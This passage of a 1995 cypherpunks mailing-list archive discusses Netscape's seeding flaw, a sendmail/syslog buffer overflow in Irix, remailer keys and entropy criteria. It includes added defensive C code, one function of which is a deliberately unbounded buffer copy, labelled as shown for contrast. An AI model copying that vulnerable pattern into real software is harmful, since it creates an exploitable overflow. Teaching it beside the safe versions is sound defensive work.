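    memset(buf, 0, len);
    return -1;
}

/* Produce a fresh KEY_BYTES-long random token, hex-encoded into `out`.
 * Returns 0 on success, -1 if the device could not be read. */
int new_token_hex(const char *path, char out[2 * KEY_BYTES + 1])
{
    static const char digits[] = "0123456789abcdef";
    unsigned char raw[KEY_BYTES];
    int i;

    if (read_random(path, raw, sizeof raw) != 0) {
        out[0] = '\0';
        return -1;
    }
    for (i = 0; i < KEY_BYTES; i++) {
        out[2 * i]     = digits[raw[i] >> 4];
        out[2 * i + 1] = digits[raw[i] & 0x0f];
    }
    out[2 * KEY_BYTES] = '\0';
    return 0;
}

int main(void)
{
    char hex[2 * KEY_BYTES + 1];

    if (new_token_hex("/dev/random", hex) != 0) {
        fprintf(stderr, "no usable random device, refusing to continue\n");
        return 1;
    }
    printf("token: %s\n", hex);
    return 0;
}
```

The caller must treat a -1 return as fatal and not fall back to a clock or process-id seed.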




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 22 Sep 95 17:04:54 PDT
To: perry@piermont.com
Subject: Re: netscape bug
Message-ID: <199509230003.RAA06024@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFALB4.A5u@sgi.sgi.com>, "Perry E. Metzger" <perry@piermont.com> writes:

> I can tell you in general terms -- I don't write MIPS assembler
> myself. However, I will point out to you that you use an ancient
> Sendmail, and that it uses syslog(3) on user produced data, and that
> syslog uses a static buffer. Trick sendmail into logging something
> very big, and you can do what you like. The 8lgm people wrote a demo
> for Sparc as a proof of concept.

Hmm, after having looked at the syslogd code, it looks like this
particular bug has been fixed for at least several years.  However,
there sure are a hell of a lot of fixed size buffers being allocated off
the stack and some of them are being used in unsafe ways.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave_Neuenschwander@va.arca.com (Dave Neuenschwander)
Date: Fri, 22 Sep 95 14:27:01 PDT
To: Jeff_Williams@va.arca.com
Subject: Re: Fwd: Re: Project: a standard cell random number generator
Message-ID: <920706973.5067212@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff,

Yes Fortezza cards can be instructed to produce a random number through one
of its library calls (someday they'll have a real API).  One of the
diagnostic tools I had tested this function.  What algorithm do they use?
Haven't a clue.  Sources say that the RNG implementation may vary from vendor
to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

Daven

----------------------------------------------------------------------
Arca Systems, Inc.                     Leaders in Security Integration
----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Fri, 22 Sep 95 16:27:39 PDT
To: cjs@netcom.com (Christopher J. Shaulis)
Subject: Re: Netscape to end Linux support?
Message-ID: <1871@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


What? Who can I call at Netscape?

I have not gotten a recent version to work with 1.2.8..


 
>> 
>> And the sad part is that now that they have announced that they are
>> dropping their unofficial Linux support, I really want to hurt
>> Netscape badly.
>> 
>> Sigh.
>> 
>Anyone got a pointer to this announcement?
>
>Damn!  Just when I was starting to like them ...
>
>-- 
>Jeff Simmons                           jsimmons@goblin.punk.net
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 22 Sep 95 17:50:37 PDT
To: perry@piermont.com
Subject: Re: netscape bug
Message-ID: <199509230049.RAA06102@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


I said:

In article <DFALB4.A5u@sgi.sgi.com>, "Perry E. Metzger" <perry@piermont.com> writes:

>> I can tell you in general terms -- I don't write MIPS assembler
>> myself. However, I will point out to you that you use an ancient
>> Sendmail, and that it uses syslog(3) on user produced data, and that
>> syslog uses a static buffer. Trick sendmail into logging something
>> very big, and you can do what you like. The 8lgm people wrote a demo
>> for Sparc as a proof of concept.

> Hmm, after having looked at the syslogd code, it looks like this
> particular bug has been fixed for at least several years.  However,
> there sure are a hell of a lot of fixed size buffers being allocated off
> the stack and some of them are being used in unsafe ways.

Whoops.  Having done a little more checking, it appears that this bug
does indeed occur in all current versions of Irix.  There's a patch for
it (patch 825) that will be out imminently.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com
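
Added example (not code from Netscape, syslog, or any poster in this thread): the fixed-size-buffer problem discussed in Ray Cromwell's and Tom Weinstein's messages, shown as an unbounded copy beside bounded versions that fail closed. The function names, HOST_MAX, and the use of the four bytes from the quoted filter as host terminators are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define HOST_MAX 64            /* constructed buffer size, not Netscape's */

/* Bytes that end the host scan: the four values the quoted filter screens
 * out (0x22, 0x3e, 0x00, 0x2f). Treating them as terminators is an
 * assumption of this example. */
static int is_terminator(unsigned char c)
{
    return c == '"' || c == '>' || c == 0 || c == '/';
}

/* The defect class under discussion (hypothetical reconstruction): the loop
 * stops only on a terminator byte, so the input decides how far past the
 * end of `host` the writes go. Shown for contrast; never call it on
 * untrusted input. */
void copy_host_unbounded(const char *url, char *host)
{
    while (!is_terminator((unsigned char)*url))
        *host++ = *url++;
    *host = '\0';
}

/* Bounded version: returns the host length, or -1 if the host does not fit
 * in hostsz bytes including the NUL. On failure the output is emptied so no
 * partial host name is ever used. */
int copy_host_bounded(const char *url, char *host, size_t hostsz)
{
    size_t n = 0;

    if (hostsz == 0)
        return -1;
    while (!is_terminator((unsigned char)url[n])) {
        if (n + 1 >= hostsz) {
            host[0] = '\0';
            return -1;
        }
        host[n] = url[n];
        n++;
    }
    host[n] = '\0';
    return (int)n;
}

/* Logging user-produced data into a fixed buffer: the data is passed as an
 * argument to "%s", never as the format string, and snprintf's return value
 * is checked. Returns 0 if the line fit, 1 if it was truncated (the line
 * then ends in "..."), -1 on error. */
int format_log_line(char *out, size_t outsz, const char *tag, const char *data)
{
    int n;

    if (outsz == 0)
        return -1;
    n = snprintf(out, outsz, "%s: %s", tag, data);
    if (n < 0) {
        out[0] = '\0';
        return -1;
    }
    if ((size_t)n >= outsz) {
        if (outsz >= 4)
            memcpy(out + outsz - 4, "...", 4);
        return 1;
    }
    return 0;
}

int main(void)
{
    char host[HOST_MAX], line[32], longurl[300];

    /* Constructed input: 299 bytes of 'a' with no terminator before the NUL. */
    memset(longurl, 'a', sizeof longurl - 1);
    longurl[sizeof longurl - 1] = '\0';

    printf("short: %d\n",
           copy_host_bounded("www.example.com/index.html", host, sizeof host));
    printf("long:  %d\n", copy_host_bounded(longurl, host, sizeof host));
    printf("log:   %d \"%s\"\n",
           format_log_line(line, sizeof line, "href", longurl), line);
    return 0;
}
```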




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 17:39:00 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape sub rosa?
Message-ID: <ac88a5dd0102100431c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 AM 9/21/95, Matthias Jordan wrote:
>Hello, Tim!
>
>> Gee, where's that "Cypherpunks logo" when you really need it?
>>
>> A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>> pecking at weak keys?
>
>How about an anarchism-A (an A in a circle) with the circle not
>being totally closed thus describing a C?

That was actually done by someone in Monte Carlo when I was giving a talk
on crypto anarchy. Somebody drew in this anarchy-in-a-C on an announcement
of my talk. I still have this.

ObCypherpunks Relevance: This is "coding in C," isn't it?

--Tim May

BTW,  to set the record straight, my "Gee, where's that "Cypherpunks logo"
when you really need it?" was tongue-in-cheek (a kind of irony, for you
foreigners).


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hortmann <michaelh@Informatik.Uni-Bremen.DE>
Date: Fri, 22 Sep 95 08:53:02 PDT
To: cypherpunks@toad.com
Subject: new source of PGP sourcecode
Message-ID: <199509221554.RAA22108@bettina.informatik.uni-Bremen.de>
MIME-Version: 1.0
Content-Type: text/plain


Michael Hortmann
Dept. of Mathematics
University of Bremen
michaelh@informatik.uni-Bremen.de

PGP public key by finger
____________


Reconstructing PGP 2.6.1 Sourcecode by Scanning and OCR'ing the MIT-Press Book


It has always been somewhat awkward to produce legal versions of PGP
outside the US, requiring a lot of extra work.

Recently, MIT-Press published the book

	Philip Zimmermann
	PGP Source Code and Internals
	
which can be purchased in any bookstore.

In the foreword it is mentioned that this book may not be exportable, because
it has not been granted a "Commodities Jurisdiction" (CJ) by the US State
Department. However, the international book distributors don't seem to take
notice of that.

Presently, I'm trying to find out what the legal status of the book may be
in Germany, if it would be legitimate to request me to destroy it, or if on
the contrary I can legally extract its contents and publish the result
on the Internet.

In the meantime I have asked some of my students to scan the book.
This has already been accomplished, resulting in about 150MB image files.
Right now the OCR process is on its way; by looking at samples we are
optimistic that most mistakes will be found and corrected by a semiautomatic
editing process; what mistakes remain should be detected by the compiler.

As we will keep the image files, the original OCR files, the awk-scripts
and intermediate files of the editing process, there can be no doubt
that the final sourcecode has resulted from the book, and not from
an illegal ftp. Each file will be marked as of this origin.

When I'm convinced of the legality of this course of action, I will give
notice on the Net and deposit the final product and the intermediate files
under appropriate names in

          ftp://ftp.uni-Bremen.de/pub/security/crypt/

For the Net-community it may be interesting to know now that such a project is
on its way.

_______




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Fri, 22 Sep 95 14:59:38 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: ip: Freeh: Kiddie Porn was Encrypted (fwd)
Message-ID: <Pine.A32.3.91.950922175903.20886D-100000@POWERED.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


From: sobel@epic.org (David L. Sobel)


In an address at the International Cryptography Institute
conference in Washington today, FBI Director Louis Freeh
revealed that the Bureau encountered encrypted material during
the course of its "Innocent Images" investigation.  That
operation recently led to dozens of nationwide arrests for
alleged trafficking in child pornography via America Online.
Freeh also disclosed that encrypted files were found during the
course of a terrorism investigation in the Philippines involving
an alleged plot to bomb a U.S. airliner and assassinate Pope
John Paul II.

The FBI Director characterized encryption as a "public safety"
issue and stated that the FBI and law enforcement agencies
around the world "will not tolerate" a situation in which the
wide availability of encryption may impede those agencies'
"public safety functions."  While noting that the current U.S.
government policy is to encourage the "voluntary" adoption of
key-escrowed encryption techniques, Freeh raised the specter of
a mandated "solution."  Freeh stressed that the FBI "prefers" a
"voluntary approach," but likened the encryption issue to last
year's Digital Telephony debate, where the FBI first attempted
to achieve voluntary compliance but eventually sought and
obtained a legislative mandate to assure law enforcement access
to digital communications.  Freeh indicated that "if consensus
is impossible" on the encryption issue, the FBI "may consider
other approaches."

Following his prepared address, Freeh was asked why the FBI
needs key-escrow when it has apparently been successful in
decrypting information encountered in the cited investigations.
His response to this question was somewhat vague, leaving
unanswered the question of whether or not the Bureau was, in
fact, able to decrypt the encrypted files seized in the
"Innocent Images" investigation.  More information on this
point is likely to emerge as these cases come to trial.


David Sobel
Legal Counsel
Electronic Privacy Information Center
http://www.epic.org





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGMxs75ALmeTVXAJAQE+8gL/SYfKkwRCROh5jPW/WmhHfpjze4u1W32H
iA7jwFUilD1kawEzngqtmQoTwjYnpD8ShwDIIgmYnCNMwf4wYdm8FNZGvzenj/jx
8a20Xhw/aqLRL/qum/gMHTnhlEMTMlha
=4U03
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Fri, 22 Sep 95 16:35:43 PDT
To: cypherpunks@toad.com
Subject: 2 new MixMasters
Message-ID: <199509222335.SAA08173@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	There are two new type-II remailers that just started in 
operation today. These are type-II only remailers. There is no type-I 
support. I vouch for these two remailers as I know the individuals 
running them personally. Below are the public keys for these sites. As a 
matter of fact, here is the type2.list and pubring.mix that 
mixmaster@vishnu.alias.net uses.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

type2.list:

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
crown mixmaster@kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
hroller hroller@c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1
precipice mixmaster@mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

- -----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

- -----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

kethermix mixmaster@kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11

- -----Begin Mix Key-----
409deae815e07f4c40188de1148c1499
258
AASySwFrEZJjUxIPXamqGuKDf3/4TnsOv9dhvs5r
FgVY2MxR7K497jLRwYBPlp8z5JrX21WMbMCBXS2x
8gD2kttZwD5uA05AjujxZzIYA69O2FfRuJ4CKRWW
tdqlzZBXrwzFmMQm45ZocMm6cz+iR373qbgimRgo
U4O0GT7CL6DxtwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

- -----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hroller hroller@c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11

- -----Begin Mix Key-----
0b7e31bbfbb0159eea07144ab15b45f3
258
AAS+WXQ5iseHl1nf+gSXmIZbIScPI2Py9e+o+UCY
FQT86f/cKyblwb/SY5v4A3pykyxTDC/T+f416Lel
A7PhZfvSix/yM73f2yUCaFt7w9vFNmf4Y+5h/FWJ
fNj0wwmy5foWIhlDkI3ue1uy4GZ18H5s43bs5qyz
3wDtH8C5wEbpJwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

- -----Begin Mix Key-----
3d523f1fd30b5a1c57214960a00f1c4e
258
AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3
s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L
Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za
17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF
rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

- -----Begin Mix Key-----
6c4e7372e84d7092e0d0e69c20d5be46
258
AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ
60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM
HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH
GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX
kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

- -----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

- -----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

- -----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

- -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0

- -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11


gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1



q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1


Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1


precipice mixmaster@mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1


secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b


anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 18:27:21 PDT
To: cypherpunks@toad.com
Subject: "Going after Netscape"
Message-ID: <ac88af4202021004670f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 9/23/95, Jim Ray wrote:

>I'm with Lucky, let's go after Netscape itself. They deserve it more
>than their customers do, and they would then have a strong motivation
><evil grin> to fix it. The press release would then *only* involve
>Netscape, and maybe a few C-punks could buy a few Netscape puts ;)
>and donate the bucks made for something like Tim's stable remailer.

I think we need to be very careful not to do things like we have a vendetta
against Netscape.

Netscape has a Cypherpunks presence, of course, and His Andreeseeness was
even on the list for a while last December.

Today's "San Jose Mercury News" had a photo of Goldberg and Wagner and a
fairly long article about how James Barksdale, Pres. of Netscape, plans to
hire them to help improve Netscape's security. He even made noises about
thanking them for their cracking efforts, and said improving Netscape's
security is a high priority.

It's sort of hard for me to imagine a company being more "Cypherpunks
friendly" than this.

(I mean about the issues that interest us.)

So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
as several of us noted a few months ago...probably a different problem, but
indicative that Netscape can be corrupted). But let's be careful not to
convey any flavor of this being a vendetta.

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Fri, 22 Sep 95 17:50:33 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape)
Message-ID: <30635951@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:
# You might want to read RFC 1750,

Phil Karlton writes:
> Did that. It talks about a lot of the pitfalls. Unfortunately it does not
> address (nor can it realistically be expected to address) details of what
> to look for on a particular version of an OS running on some particular
> platform.

Can someone point me to a compilation of such information?  If not, I'm
definitely interested in starting a Web page to chronicle recommendations
about good, bad, and questionable random and pseudo-random sources for
specific architectures and operating systems. (It could also include
information on special-purpose plug-in hardware RNGs.)

 -Futplex <futplex@pseudonym.com>

Having overcome my initial skepticism on the entire topic of entropy, based 
on the useful pointers to the literature I have received, I agree 
wholeheartedly with the need for _positive_ design criteria against which 
designs may be evaluated.  For initial consideration, I recommend the 
following:

The entropy E is defined by the sum across n states of -P_i log_2(P_i), 
where i ranges from 1 to n, and P_i is the probability of state i.  In order 
for this expression to have meaning, all four of the following criteria 
must be met:

1)  The states exist and can be identified.
2)  The number of states n is known.
3)  The index value i uniquely identifies a state.
4)  The function P_i is known and well-behaved.

The designer should disprove the negative of each of these to arrive at a 
_concise_ statement of their "proof" of measured entropy equating to 
predicted entropy.  For example, the designer should "disprove" the 
statements: "The states do not exist.  Even if the states exist, they cannot 
be identified." by clearly stating the factors that lead to the existence of 
the states, and precisely why they can be identified.  This provides a list 
of requirements (in effect) for a deployment to meet the expected entropy.

I think that application of these criteria can rigorously explain the 
difficulties in using mouse movements, for example, as a source of entropy.  
In addition, the problems with clocks in PC emulations on Macs also speak 
to these criteria.  Certainly the entropy available from pid is also 
explained here in a rigorous way.

I would appreciate feedback on this as a foundation for a set of _positive_ 
design criteria for sources of entropy.  If I have missed information in the 
literature that provides design guidance (not anecdotal pitfalls, which are 
very valuable but lack rigor in the cases I have seen), I would very much 
appreciate that as well.  A special thanks to Tim May for his references.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 18:45:16 PDT
To: cypherpunks@toad.com
Subject: More on "Entropy"
Message-ID: <ac88b54604021004d0c0@[205.199.118.202]>
